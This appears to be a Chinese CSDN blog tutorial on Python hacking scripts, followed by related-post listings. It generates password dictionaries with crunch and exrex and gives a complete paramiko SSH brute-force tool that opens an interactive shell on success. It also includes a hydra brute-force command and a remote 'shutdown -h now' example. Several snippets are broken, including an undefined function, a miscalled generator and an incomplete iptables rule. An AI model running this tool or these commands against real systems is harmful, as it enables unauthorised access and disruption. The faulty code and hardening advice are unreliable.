DAY11:python 脚本篇

已于 2022-09-22 17:02:05 修改
阅读量523 收藏 1
点赞数 2
文章标签: python 前端 开发语言
于 2022-07-22 21:11:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_49433473/article/details/125940027
版权

DAY11:python 脚本篇

1、字典生成器

工具----crunch

用法:

crunch <min-len> <max-len> [<charset string>] [options]

min-len crunch要开始的最小长度字符串		必需
max-len crunch要开始的最大长度字符串		必需
charset string 在命令行使用crunch你可能必须指定字符集设置,否则将使用缺省的字符集设置。必须指定字符类型或加号的值

crunch    -h	 #昂住
-c				#指定写入输出文件的行数,也即包含密码的个数
-d				#限制出现相同元素的个数 数字是连续字母出现的次数,符号是限制字符串的字符(“@”代表小写字母,“,”代表大写字符,				   “%”代表数字,“^”代表特殊字符)限制每个密码至少出现几种字符
-e				#字符串,定义停止生成密码
-f /path/to/charset.lst charset-name # 从charset.lst指定字符集
-i				#改变输出格式
-o	name.txt	 #指定输出文件的名称
-p  	    	 #字符串或者-p ...以排列组合的方式来生成字典
-q	name.txt	 #读取name.txt

2、利用 python 编写一个字典生成器

2.1、exrex 库

re.DEBUG模式下进行的归类和分析,从而匹配内容
生成所有匹配的字符串
生成随机匹配字符串
计算匹配字符串的数量
简化正则表达式

exrex.getone()
exrex.generate()
2.1.1、exrex.getone()
print(exrex.getone('\d{3}-\d{4}-[0-9]{4}'))	#数字
print(exrex.getone('(ex)r\\1'))			   #填正则表达式会生成相应内容
print(exrex.getone('(1[0-2]0[1-9])(:[0-5]\d){2} (A|P)M')) #时间

输出为:

123-9462-3188
exrex
21:19:39 PM
示例1:exrex.getone() 生成手机号
import exrex
for i in range(30):
    num = '1[0-9]{10}'
    phone_number = exrex.getone(num) # exrex.getone()方法 exrex.generate()方法
    print(phone_number)
2.1.2、exrex.generate()
num=list(exrex.generate('((hai){2}|hacker!)'))	##匹配两个hai或hacker
print(num)

num=list(exrex.generate('[Pp][a@]ssw[Oo]rd'))	#知道密码的一些组合,进行局部爆破(最重要)
print num									 #exrex.generate(’[Pp][a@]ssw[Oo]rd’) 组合密码

输出为:

['haihai', 'world!']
示例1:exrex.generate() 生成密码
import exrex
web_dict = '123'
dic_pass = '456'
dics = list(exrex.generate(web_dict+dic_pass+'[@#!%^&*]'))
for i in dics:
    print(i)
示例二:
def make_pass(pwds):
    f=open('password','w')
    f.close()
    for pwd in pwds:
        num='135[0-9]{8}'
        for number in num:
            final_pwds=list(exrex.generate(number.format(pwd=pwd)))
            for final_pwd in final_pwds:
                print(final_pwd)
                
               	f=open('passwd.txt','a+')
                f.write(final_pwd + '\n')
                f.close()
                
if __name__=='__main__':
    make_pass()

2.2、random 库

示例:利用 random 库生成字典
import random
class Password():
    strs = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789~!@#$%^&*'
    def __init__(self,minlen,maxlen):
        if maxlen>minlen:
            self.__minlen=minlen
            self.__maxlen=maxlen
        else:
            self.__maxlen=minlen
            self.__minlen=maxlen
    def __iter__(self):             #迭代器函数初始化
        return self
    def __next__(self):
        ret =''
        for i in range(0, random.randrange(self.__minlen, self.__maxlen+1)):
            ret += random.choice(Password.strs)
        return ret

if __name__=='__main__':
    for str in Password(1, 10):     #1-10位随机密码
        print(str)

2.3、sys 库

sys.palatform					   #处理器信息
sys.getfilesystemcoding()			#编码信息输入
sys.getfilesystemencoding()			#编码信息输出
sys.getdefaultencoding()			#标准输入输出

2.4、hashlib 库

2.5、kali-------john the ripper

3、暴力破解 ssh

3.1、paramiko 库

3.1.1、SSHClient 类
connect方法
hostname	#ip
port 22		#22端口
password	#密码
pkey 		#用于身份验证
timeout		#超时
3.1.2、exec_command() 方法
command() 		#执行的命令
bufsize()		#文件缓冲区大小
3.1.3、load_system_host_keys() 方法
filename		#远程主机公钥记录文件
3.1.4、set_missing_host_key_poilcy() 方法
示例1:上传(下载)文件
import paramiko
def sftp_upload_file(server_path, local_path):
    try:
        ftp= paramiko.Transport(("172.16.0.xxx", 22))            #输入ip地址
        ftp.connect(username="xxx", password="xxx")             #输入用户名和密码
        sftp = paramiko.SFTPClient.from_transport(ftp)
        sftp.put(local_path, server_path)
        ftp.close()
    except Exception as e:
        print(e)
if __name__ == '__main__':
    sftp_upload_file("/root/1.txt", "C:/Users/1.txt")      #将本地文件及路径,上传到终端目录下命名为1.txt
    sftp_down_file("")								    #下载文件
示例2:执行命令
# -*- coding:utf-8 -*-
import paramiko
def sftp_exec_command(command):
    try:
        # 创建SSH对象
        ssh_client = paramiko.SSHClient()
        # 允许连接不在known_hosts文件上的主机
        ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        # 连接服务器  输入ip地址、用户名和密码
        ssh_client.connect(hostname="172.16.0.1xx",port="22",username="xx",password="xx")
        # 执行命令
        std_in, std_out, std_err = ssh_client.exec_command(command)
        # 获取结果将结果输出
        for i in std_out:
            print (i.strip("\n"))
        ssh_client.close()
    except Exception as e:
        print(e)
#命令
if __name__ == '__main__':
    sftp_exec_command("shutdown -h now")
示例3:ssh爆破
#!/usr/bin/python3
# -*- coding: utf-8 -*-

import paramiko
import argparse
import sys
 
def sshbrute(user,passwd,host):
    # 设置 flag 为 0 ,在成功登录的时候再置为 1 
    flag = 0
    try:
        # 使用 paramiko.SSHClient 创建 ssh 对象
        ssh = paramiko.SSHClient()
 
        # 允许将信任的主机自动加入到host_allow 列表,此方法必须放在connect方法的前面,接受对方的公钥证书
        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
 
        # 登录 ssh,连接失败则抛出 异常 跳转到 except ,成功则继续执行
        ssh.connect(hostname=host,port=22,username=user,password=passwd,timeout=3)
 
        # 打印出成功登录的 用户名 和 密码
        print("login success! User:"+user,"Pass:"+passwd)
        # 把 flag 置为 1
        flag = 1
 
    except:
        # 打印出 登录失败 的 用户名 和 密码
        print("login failed!","user:"+user,"pass:"+passwd)
    # 如果 flag 为 1,则进入 terminal
    if flag == 1:
        while True:
            # 获取 输入的命令
            input_command = input(">>")
            # 如果 输入 quit 就关闭 ssh 连接,并退出程序
            if input_command == 'quit':
                print("quit!")
                ssh.close()
                exit(0)
            # 执行 输入的命令
            stdin,stdout,stderr = ssh.exec_command(input_command)
            # 获取 返回的结果 并打印
            result = stdout.read()
            print(str(result,'utf-8'))
 
if __name__ == "__main__":
    # 自定义接受参数
    parse = argparse.ArgumentParser("python3 "+sys.argv[0])
    parse.add_argument("-u <USER>","--user",help="login with user name")
    parse.add_argument("-U <USERFILE>","--userfile",help="load user from USERfile")
    parse.add_argument("-p <PASS>","--passwdd",help="try passwdd with PASS")
    parse.add_argument("-P <PASSFILE>","--passfile",help="load PASS from PASSFILE")
    parse.add_argument("-t","--target",help="client ip ")
    # 把接受到的参数保存在变量中
    args = parse.parse_args()
    user = args.user
    passwd = args.passwdd
    target = args.target
    ufile = args.userfile
    pfile = args.passfile
 
    # 判断 target 是否存在
    if not target:
        print("target not set!")
        exit(0)
    # 如果 输入了 -U 和 -P 参数则循环读出 ufile 中的 用户名 和 pfile 中的密码
    if ufile and pfile:
        tmp_ufile = open(ufile,'r')
        tmp_pfile = open(pfile,'r')
        # 循环输入用户名
        for a in tmp_ufile.readlines():
            tmp_pfile = open(pfile,'r')
            # 循环输入密码
            for b in tmp_pfile.readlines():
                sshbrute(a.replace('\n',''),b.replace('\n',''),target)
            # 密码读取完后需要关闭 在下一次读取的时候重新打开
            tmp_pfile.close()
        tmp_ufile.close()
    # 如果 输入了 -P 和 -u 则循环读出 pfile 中的 密码,用 <user> 和 pfile中的密码登录 
    elif pfile and user:
        tmp_pfile = open(pfile,'r')
        res_pfile = tmp_pfile.readlines()
        tmp_pfile.close()
        for i in res_pfile:
            sshbrute(user,i.replace('\n',''),target)
    # 如果 输入了 -U 和 -p 就循环读出 ufile 中的用户名,用 <passwd> 和 ufile中的用户名登录
    elif ufile and passwd:
        tmp_ufile = open(ufile,'r')
        res_ufile = tmp_ufile.readlines()
        tmp_ufile.close()
        for i in res_ufile:
            sshbrute(i.replace('\n',''),passwd,target)
    # 如果直接给出了 用户名和密码 则直接使用给出的用户名和密码登录
    elif user and passwd:
        sshbrute(user,passwd,target)

3.2、kali----hydra(九头蛇)

hydra  -h
-p		#指令密码
-l		#指定用户名
-L		#指定用户名字典
-P		#指定密码字典
-o		#将结果输出到文件中
-v		#显示详细过程
-t		#线程数
-f		#检测到用户名或密码正确就退出
hydra -L users.txt -P passwd.txt -t 20 192.168.10.10 ssh -o 1.txt -f

3.3、pexpect 库

4、防御 SSH 爆破

1、修改防火墙入站规则
iptables -A INPUT -m state --state NEW -m tcp -p --dport -j ACCEPT

2、修改默认端口
vim /etc/ssh/sshd_config
  22改为任意大端口号
service sshd restart

3、配置用户登录
vim /etc/ssh/sshd_config
AllowUsers  root
EdmunDJK
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Python常用模块 之 exrex模块:处理和生成re匹配的字符串
孤寒者的博客
02-28 1万+
exrex模块提供了一些功能来处理和生成正则表达式匹配的字符串。
字典生成器-随机串生成器1234
02-26
demo使用
python字典生成器_Python字典生成式、集合生成式、生成器用法实例分析
weixin_35995377的博客
02-03 960
本文实例讲述了Python字典生成式、集合生成式、生成器用法。分享给大家供大家参考,具体如下:字典生成式:跟列表生成式一样,字典生成式用来快速生成字典,不同的是,字典需要两个值#d = {key: value for (key, value) in iterable}d1 = {"x": 1, "y": 2, "z": 3}d2 = {k: v for (k, v) in d1.items()}p...
python生成器应用之字典生成
shadow20112011的博客
09-23 2761
python 生成器 python 生成器,这里是指包含 yield关键字的函数,区别于类似表达式的那种情况,例如: generator = (x*5+6 for x in range(20)) 本文主要探讨 生成器函数(如下代码)在字典生成的应用。 def counts(n): i=0 while i < n: yield i i +=1 ...
Pydictor字典生成器操作手册
weixin_44820552的博客
04-06 1308
pydictor 是一个使用 python 语言开发,通过命令行生成爆破字典的强大工具,包含有自定义字符集字典字典合并,词频统计,去除重复项,枚举数字字典,后台管理员密码字典字典编码,加密,社会工程学字典等功能。参数解释:-char 自定义字符集字典模块 "asdf123._@":双引号里是自定义字符--tail 添加后缀为@site.com。
密码字典生成工具:crunch
热门推荐
weixin_41715662的博客
07-10 1万+
字典生成工具(crunch)的使用详解
2022-渗透测试-口令破解-几款暴力破解和字典生成的工具
保持微笑的博客
01-21 1万+
1.CUPP(kali) 首先,安装cupp软件 apt install -y cupp 新建一个文件夹,用于保存生成的字典 输入 cupp -i 命令开始编辑生成字典 根据自己已知的信息,生成字典。 查看生成的字典 cat san.txt 2.亦思社会工程学学点生成器 3.一句话密码破解工具 4.crunch(kali) crunch是kali自带的工具,是一种创建密码字典的工具。按照指定的规则生成密码字典,可以灵活的定制自己的字典文件。 ...
《云计算全栈》-python:使用python模拟cp操作、编写脚本实现linux中cp操作
12-21
3 案例3:模拟cp操作 3.1 问题 创建cp.py文件,实现以下目标: 将/bin/ls“拷贝”到/root/目录下 不要修改原始文件 12 3.2 方案 获取用户原文件名和新文件名,打开原文件,打开新... [root@localhost day03]# vim cp
dayone-to-ghost:一个 Python 脚本,可从您的 DayOne 日记中为 Ghost 创建可导入文件
06-02
###依赖 brew install pandocpip install pypandoc###用法 $ python dayoneToGhost.py 这将创建一个dayone_export_<date>.json文件和一个包含所有 DayOne 照片的content目录。 您需要做的就是导入dayone_export_...
ohlife-2-dayone:Ohlife 已宣布关闭。 此脚本将帮助将 Ohlife 数据移动到 Dayone(另一个应用程序)
06-17
我编写了这个脚本来格式化数据并将其导入 DayOne 应用程序。 获取 DayOne 和 CLI 在 Mac 上安装应用程序(不幸的是没有 Win32/Linux )并运行它。 转到顶部栏上的> DayOne ,然后单击安装命令行工具或从下载。 ...
Crunch.py:等效于Crunch密码列表生成器Python
03-11
皮伦奇 紧缩的Python脚本 它没有用C语言编写的原始紧缩速度快,但在其他世界一流的生成器中绝对快。 我将在将来添加多处理。 Usage: pyrunch.py <min> <max> <characters> <options> or pyrunch.py --mask <mask> <options> Options: -o Set a Name or Directory for Output File (use -o - for piping the output to aircrack-ng, etc...) -m Memory Friendly mode(slightly slower) [default: off] -s suffix Add a Suffix to Passwords -
超级强大的字典生成器(破解版)
02-03
设计十分合理,十分简单,十分快速 目前为止我用过的最好的wpa字典生成器
数据字典生成器.zip
08-26
数据字典生成器数据字典生成器数据字典生成器数据字典生成器数据字典生成器数据字典生成器数据字典生成器数据字典生成器数据字典生成器数据字典生成器
superdic易优超级字典生成器 好用的字典生成器
07-15
superdic超级字典生成器 好用的字典生成器 用于生成破解字典 内设多种智能模式 是字典生成器中不可或缺的法宝
非常好用的数据库字典生成工具
08-16
非常好用的数据库字典工具
slack-reminder:用于打开拉取请求的松弛提醒的 Python 脚本。 Eventmobi HackDay 项目
06-12
松弛提醒 一个小的 Python 脚本,它通过 Slackbot 通知提醒人们打开的拉取请求。 使用 Github 和 Slack API。
analyze-tweets-from-tg:用于分析 TwitterGoggles 收集的推文的 Python 脚本
06-28
用于分析使用收集的推文的 Python 脚本。 重点是语言语言使用趋势。 在你开始之前 您需要向 MySQL 数据库中的tweets表添加一个新列并设置其值。 ALTER TABLE `tweets` ADD `day` DATE AFTER `created_at`; ...
一款可自定义自动字典生成器---火花
G0mini的博客
08-06 990
火花字典生成器
【网安神器】——Crunch字典生成工具
Demo不是emo的博客
11-22 1万+
crunch是一个kali自带生成字典的一个工具,一种创建密码字典工具,该字典通常用于暴力破解。使用Crunch工具生成的密码可以发送到终端、
python脚本定时
最新发布
07-28
你可以使用 Python 的第三方库 `schedule` 来实现定时执行脚本的功能。首先,你需要安装 `schedule` 库,可以通过以下命令使用 pip 进行安装: ``` pip install schedule ``` 然后,你可以编写一个 Python 脚本,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值